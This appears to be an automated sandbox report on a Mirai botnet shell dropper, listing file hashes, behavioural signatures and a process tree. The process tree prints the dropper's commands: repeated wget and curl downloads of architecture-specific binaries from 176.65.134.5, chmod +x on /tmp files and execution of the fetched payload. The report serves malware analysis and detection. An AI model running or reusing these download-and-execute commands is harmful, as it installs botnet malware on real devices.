Analysis

  • max time kernel
    139s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    08/03/2025, 08:41

General

  • Target

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh

  • Size

    1KB

  • MD5

    c46ce91068e77aa58bd2127bec2ee6c3

  • SHA1

    fced6e9a98cb1fd8b568f7698dbf1b4e1e4231d5

  • SHA256

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a

  • SHA512

    ace2a1517ff4dceb812a495e8f5d5a4bbec6825964ffca84b076f57610ed09232b3ad76e995fd83ba121d4a36f82acb0136f27da8d4fc272bd083ac1d8e3e7e9

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (177422) number of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    1⤵
    • Executes dropped EXE
    • Modifies Watchdog functionality
    • Renames itself
    • Enumerates active TCP sockets
    • Changes its process name
    • Reads system network configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:1488
    • /usr/bin/wget
      wget http://176.65.134.5/jklx86
      2⤵
      • Writes file to tmp directory
      PID:1492
    • /usr/bin/curl
      curl -O http://176.65.134.5/jklx86
      2⤵
      • Writes file to tmp directory
      PID:1500
    • /bin/cat
      cat jklx86
      2⤵
        PID:1509
      • /bin/chmod
        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
        2⤵
        • File and Directory Permissions Modification
        PID:1510
      • /usr/bin/wget
        wget http://176.65.134.5/jklmips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1513
      • /usr/bin/curl
        curl -O http://176.65.134.5/jklmips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1515
      • /bin/cat
        cat jklmips
        2⤵
        • System Network Configuration Discovery
        PID:1518
      • /bin/chmod
        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/ssh
        ./ssh ssh
        2⤵
          PID:1520
        • /usr/bin/wget
          wget http://176.65.134.5/jklmpsl
          2⤵
            PID:1522
          • /usr/bin/curl
            curl -O http://176.65.134.5/jklmpsl
            2⤵
              PID:1523
            • /bin/cat
              cat jklmpsl
              2⤵
                PID:1524
              • /bin/chmod
                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                2⤵
                • File and Directory Permissions Modification
                PID:1525
              • /tmp/ssh
                ./ssh ssh
                2⤵
                  PID:1526
                • /usr/bin/wget
                  wget http://176.65.134.5/jklarm4
                  2⤵
                    PID:1528
                  • /usr/bin/curl
                    curl -O http://176.65.134.5/jklarm4
                    2⤵
                      PID:1529
                    • /bin/cat
                      cat jklarm4
                      2⤵
                        PID:1530
                      • /bin/chmod
                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1531
                      • /tmp/ssh
                        ./ssh ssh
                        2⤵
                          PID:1532
                        • /usr/bin/wget
                          wget http://176.65.134.5/jklarm5
                          2⤵
                            PID:1534
                          • /usr/bin/curl
                            curl -O http://176.65.134.5/jklarm5
                            2⤵
                              PID:1535
                            • /bin/cat
                              cat jklarm5
                              2⤵
                                PID:1536
                              • /bin/chmod
                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                2⤵
                                • File and Directory Permissions Modification
                                PID:1537
                              • /tmp/ssh
                                ./ssh ssh
                                2⤵
                                  PID:1538
                                • /usr/bin/wget
                                  wget http://176.65.134.5/jklarm6
                                  2⤵
                                    PID:1540
                                  • /usr/bin/curl
                                    curl -O http://176.65.134.5/jklarm6
                                    2⤵
                                      PID:1541
                                    • /bin/cat
                                      cat jklarm6
                                      2⤵
                                        PID:1542
                                      • /bin/chmod
                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:1543
                                      • /tmp/ssh
                                        ./ssh ssh
                                        2⤵
                                          PID:1544
                                        • /usr/bin/wget
                                          wget http://176.65.134.5/jklarm7
                                          2⤵
                                            PID:1546
                                          • /usr/bin/curl
                                            curl -O http://176.65.134.5/jklarm7
                                            2⤵
                                              PID:1547
                                            • /bin/cat
                                              cat jklarm7
                                              2⤵
                                                PID:1548
                                              • /bin/chmod
                                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:1549
                                              • /tmp/ssh
                                                ./ssh ssh
                                                2⤵
                                                  PID:1550
                                                • /usr/bin/wget
                                                  wget http://176.65.134.5/jklppc
                                                  2⤵
                                                    PID:1552
                                                  • /usr/bin/curl
                                                    curl -O http://176.65.134.5/jklppc
                                                    2⤵
                                                      PID:1553
                                                    • /bin/cat
                                                      cat jklppc
                                                      2⤵
                                                        PID:1554
                                                      • /bin/chmod
                                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:1555
                                                      • /tmp/ssh
                                                        ./ssh ssh
                                                        2⤵
                                                          PID:1556
                                                        • /usr/bin/wget
                                                          wget http://176.65.134.5/jklm68k
                                                          2⤵
                                                            PID:1558
                                                          • /usr/bin/curl
                                                            curl -O http://176.65.134.5/jklm68k
                                                            2⤵
                                                              PID:1559
                                                            • /bin/cat
                                                              cat jklm68k
                                                              2⤵
                                                                PID:1560
                                                              • /bin/chmod
                                                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:1561
                                                              • /tmp/ssh
                                                                ./ssh ssh
                                                                2⤵
                                                                  PID:1562
                                                                • /usr/bin/wget
                                                                  wget http://176.65.134.5/jklsh4
                                                                  2⤵
                                                                    PID:1564
                                                                  • /usr/bin/curl
                                                                    curl -O http://176.65.134.5/jklsh4
                                                                    2⤵
                                                                      PID:1565
                                                                    • /bin/cat
                                                                      cat jklsh4
                                                                      2⤵
                                                                        PID:1566
                                                                      • /bin/chmod
                                                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:1567
                                                                      • /tmp/ssh
                                                                        ./ssh ssh
                                                                        2⤵
                                                                          PID:1568

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/jklmips

    Filesize

    74KB

    MD5

    531a60e53317c7bf134e5c6e57fc4939

    SHA1

    6069b3cb94084ec8bfad12f20a7fc992835e329d

    SHA256

    9c8fa144a9688475d367bf19f455fa2efcede7219a41cf77484cabe788e17fe9

    SHA512

    f19ca0527fb858aff4da9f864f1fad8433cc229b8ffabec4fd559a3af4a3fe3d71213a913067a6fea4314b75881ebbe5a8d24408cd8199a3ed54b15725c7505e

  • /tmp/jklx86

    Filesize

    49KB

    MD5

    ecd1b914d0248a8174d1f5ef567e2227

    SHA1

    c5ba0731a7b3236db4b8443b6be4f2f07d5ed6e5

    SHA256

    adc70485dbae6ab79f9083ff5f96da2fece8b5922f0f5d0757d1c366285bfab6

    SHA512

    9e25c305fa81ce9c4f715d6bc746fae810bc255d7e3d10017242864c4c04923644e86fce42b16c0638a06eb44aa8abec2681d944670dd22d69ac4d0cebbe979f